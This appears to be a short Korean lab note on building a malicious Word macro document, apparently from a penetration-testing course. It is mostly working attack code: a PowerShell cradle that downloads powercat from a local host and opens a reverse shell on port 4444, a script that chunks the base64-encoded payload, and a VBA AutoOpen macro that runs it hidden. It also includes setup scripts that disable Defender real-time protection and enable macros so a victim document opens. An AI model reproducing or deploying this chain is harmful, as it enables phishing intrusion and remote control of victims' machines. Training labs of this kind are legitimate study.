악성코드 분석 - 매크로 문서 악성 파일

 

 

 

 

 

 

 

 

 

IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell

 

 

str = "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGUAdwA..."

n = 50

for i in range(0, len(str), n):
	print("Str = Str + " + '"' + str[i:i+n] + '"')

청크화(문자열이 너무 길면 오류가 발생)

 

Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    
    Str = Str + "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGU"
        Str = Str + "AdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAd"
        Str = Str + "AAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwB"
    ...
        Str = Str + "QBjACAAMQA5ADIALgAxADYAOAAuADEAMQA4AC4AMgAgAC0AcAA"
        Str = Str + "gADQANAA0ADQAIAAtAGUAIABwAG8AdwBlAHIAcwBoAGUAbABsA"
        Str = Str + "A== "

    CreateObject("Wscript.Shell").Run Str
End Sub

 

 

applications_install.ps1

function Get-IP {
    try {
        return (Get-NetIPAddress | Where-Object { $_.IPAddress -like "192.168*"}).IPAddress
    } catch {
        Start-Sleep -Seconds 22
        return (Get-NetIPAddress | Where-Object { $_.IPAddress -like "192.168*"}).IPAddress
    }
}

$old_ip = '192.168.50.198'
$third = 50
$octets = ""

while ($third -eq 50) {

    $curr_ip = Get-IP
    $octets = $curr_ip.Split('.')
    $third = $octets[2]
    if ($third -eq 50) {
        Start-Sleep -Seconds 15
    }
}


$local_ip = Get-IP
if ($local_ip -ne $old_ip){


    try { (new-object -comobject word.application).version}
    catch {
        Mount-DiskImage -ImagePath C:\tools\Office2019.img
        E:\Office\Setup32.exe
        Start-Sleep -Seconds 120000
    }
}

 

 

applications_exec.ps1

# Loop for doc file and execute MyMacro
If (Test-Path C:\Users\Administrator\Documents\webapp\ticket.doc)
{
    $setup = Get-Process Setup32 -ErrorAction SilentlyContinue
    if ($setup) {
        exit
    }

    try { Start-Process WINWORD } catch { exit}
    Set-MpPreference -DisableRealtimeMonitoring $true
    
    Start-Sleep -Seconds 10
    Stop-Process -Name "WINWORD" -Force
    New-ItemProperty -Path Registry::HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security -Name "VBAWarnings" -Value "1" -PropertyType DWORD -Force
    Move-Item -Path C:\Users\Administrator\Documents\webapp\ticket.doc -Destination C:\Users\Administrator\Documents\ticket.doc
    Unblock-File -Path C:\Users\Administrator\Documents\ticket.doc
    Start-Process -FilePath "C:\Users\Administrator\Documents\ticket.doc" 
    Start-Sleep -Seconds 20
    Remove-Item C:\Users\Administrator\Documents\ticket.doc
}